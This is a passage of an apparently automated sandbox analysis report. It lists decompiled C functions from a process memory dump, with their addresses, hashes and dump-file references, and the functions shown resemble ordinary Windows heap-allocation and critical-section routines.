                        0x02bc35a5
                        0x02bc35ab
                        0x02bc35ab
                        0x02bc35b5
                        0x00000000
                        0x02bc35c1
                        0x02bc35b7

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction ID: 2f6507b817b75fb5e94e9cd595262fbfc2921ba9cf9c9a09c7b1a5e222c39d31
                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction Fuzzy Hash: E1D0C9315561849EDB51AB60C26876877F2FB0021CFF8A0ED944616953C33E8A5ADA41
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9DB40() {
                        				signed int* _t3;
                        				void* _t5;
                        
                        				_t3 = L02BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                        				if(_t3 == 0) {
                        					return 0;
                        				} else {
                        					 *_t3 =  *_t3 | 0x00000400;
                        					return _t3;
                        				}
                        			}





                        0x02b9db4d
                        0x02b9db54
                        0x02b9db5f
                        0x02b9db56
                        0x02b9db56
                        0x02b9db5c
                        0x02b9db5c

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction ID: b3f1d918583f2c34b0c8a846116b6fb7c68c6a98f68dea31d10ca834a4b3ebf5
                        • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                        • Instruction Fuzzy Hash: 20C08C30290A01AAEB222F20CD01B5036A1FB00B05F4400E0A301DA0F0DBB8D801EA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02C1A537(intOrPtr _a4, intOrPtr _a8) {
                        
                        				return L02BB8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                        			}



                        0x02c1a553

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction ID: 6d7747a604085a26c5093a357f0805b1ee672a90b472cee710487db6878c1f50
                        • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                        • Instruction Fuzzy Hash: 86C01236080248BBCB136E81CC01F567B2AEB94B60F008010BA080A5608672E970EA84
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BB3A1C(intOrPtr _a4) {
                        				void* _t5;
                        
                        				return L02BB4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}




                        0x02bb3a35

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction ID: e2638550d7d3bceea8594b22846a771e10a70b88550d43695dbe7562dbcf7cfa
                        • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                        • Instruction Fuzzy Hash: 03C08C32080648BBC7126E41DC00F117B2AEB90B60F000060B6040A5618572EC60D988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BA76E2(void* __ecx) {
                        				void* _t5;
                        
                        				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                        					return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        				return _t5;
                        			}




                        0x02ba76e4
                        0x00000000
                        0x02ba76f8
                        0x02ba76fd

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction ID: 56bdb818bb1385ee47904cdf77228328fe216d6a3fa8d6064a4544bdd3753013
                        • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                        • Instruction Fuzzy Hash: D3C08C711491C05AEB2A570CCE30B38B650EF08708F4801DCAA010D8A1CBA8A806E688
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC36CC(void* __ecx) {
                        
                        				if(__ecx > 0x7fffffff) {
                        					return 0;
                        				} else {
                        					return L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                        				}
                        			}



                        0x02bc36d2
                        0x02bc36e8
                        0x02bc36d4
                        0x02bc36e5
                        0x02bc36e5

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction ID: d74fbf1fac531db75aed45ba10a48a8c8fc59e5b7b09809a88885ae3ef43e075
                        • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                        • Instruction Fuzzy Hash: B0C09BB5155840BBD7166F30CD51F6572A5FB40B61FB407E87221455F1D6799C00D504
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B9AD30(intOrPtr _a4) {
                        
                        				return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        			}



                        0x02b9ad49

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction ID: 143084bf928b0ae52e5687aaf2a57765b78a89b03304a5fc5a56d96840decde9
                        • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                        • Instruction Fuzzy Hash: EFC08C33080288BBC7126A46CD00F11BB2AEB90B60F000020B6040AA618972E860E988
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BB7D50() {
                        				intOrPtr* _t3;
                        
                        				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t3 != 0) {
                        					return  *_t3;
                        				} else {
                        					return _t3;
                        				}
                        			}




                        0x02bb7d56
                        0x02bb7d5b
                        0x02bb7d60
                        0x02bb7d5d
                        0x02bb7d5d
                        0x02bb7d5d

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction ID: babf66837cf88a262bc2b24c773d5200ede656503b74f963429cdf70f3faef48
                        • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                        • Instruction Fuzzy Hash: C6B092353019408FCF16DF18C080B6573E4FB84A80F8400D4E400CBA20D729E8009900
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BC2ACB() {
                        				void* _t5;
                        
                        				return E02BAEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        			}




                        0x02bc2adc

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction ID: 2aaabe7a737c4a0b49cb32df75dc3ce9c496802e63ff79f3d5f408eda04c52a3
                        • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                        • Instruction Fuzzy Hash: EFB092328124408BCF02AB40C660A197372AB00750F0544A09001279208228AC01CA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E02C2FDDA(intOrPtr* __edx, intOrPtr _a4) {
                        				void* _t7;
                        				intOrPtr _t9;
                        				intOrPtr _t10;
                        				intOrPtr* _t12;
                        				intOrPtr* _t13;
                        				intOrPtr _t14;
                        				intOrPtr* _t15;
                        
                        				_t13 = __edx;
                        				_push(_a4);
                        				_t14 =  *[fs:0x18];
                        				_t15 = _t12;
                        				_t7 = E02BDCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                        				_push(_t13);
                        				E02C25720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                        				_t9 =  *_t15;
                        				if(_t9 == 0xffffffff) {
                        					_t10 = 0;
                        				} else {
                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                        				}
                        				_push(_t10);
                        				_push(_t15);
                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                        				return E02C25720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                        			}










                        0x02c2fdda
                        0x02c2fde2
                        0x02c2fde5
                        0x02c2fdec
                        0x02c2fdfa
                        0x02c2fdff
                        0x02c2fe0a
                        0x02c2fe0f
                        0x02c2fe17
                        0x02c2fe1e
                        0x02c2fe19
                        0x02c2fe19
                        0x02c2fe19
                        0x02c2fe20
                        0x02c2fe21
                        0x02c2fe22
                        0x02c2fe25
                        0x02c2fe40

                        APIs
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C2FDFA
                        Strings
                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02C2FE2B
                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02C2FE01
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                        • API String ID: 885266447-3903918235
                        • Opcode ID: 0a7288046754a48b25eeb31d504020975160531984f6e1507dcb819ce6994a75
                        • Instruction ID: 390100ab9160051215bdbca785b3ac41a79b3dd9887a5a3a402ed3d1083cb4ca
                        • Opcode Fuzzy Hash: 0a7288046754a48b25eeb31d504020975160531984f6e1507dcb819ce6994a75
                        • Instruction Fuzzy Hash: 3CF0C272240251BBE6252A55DC02E33BB6AEB44B70F140255FA28565E1EE62B820DAA0
                        Uniqueness

                        Uniqueness Score: -1.00%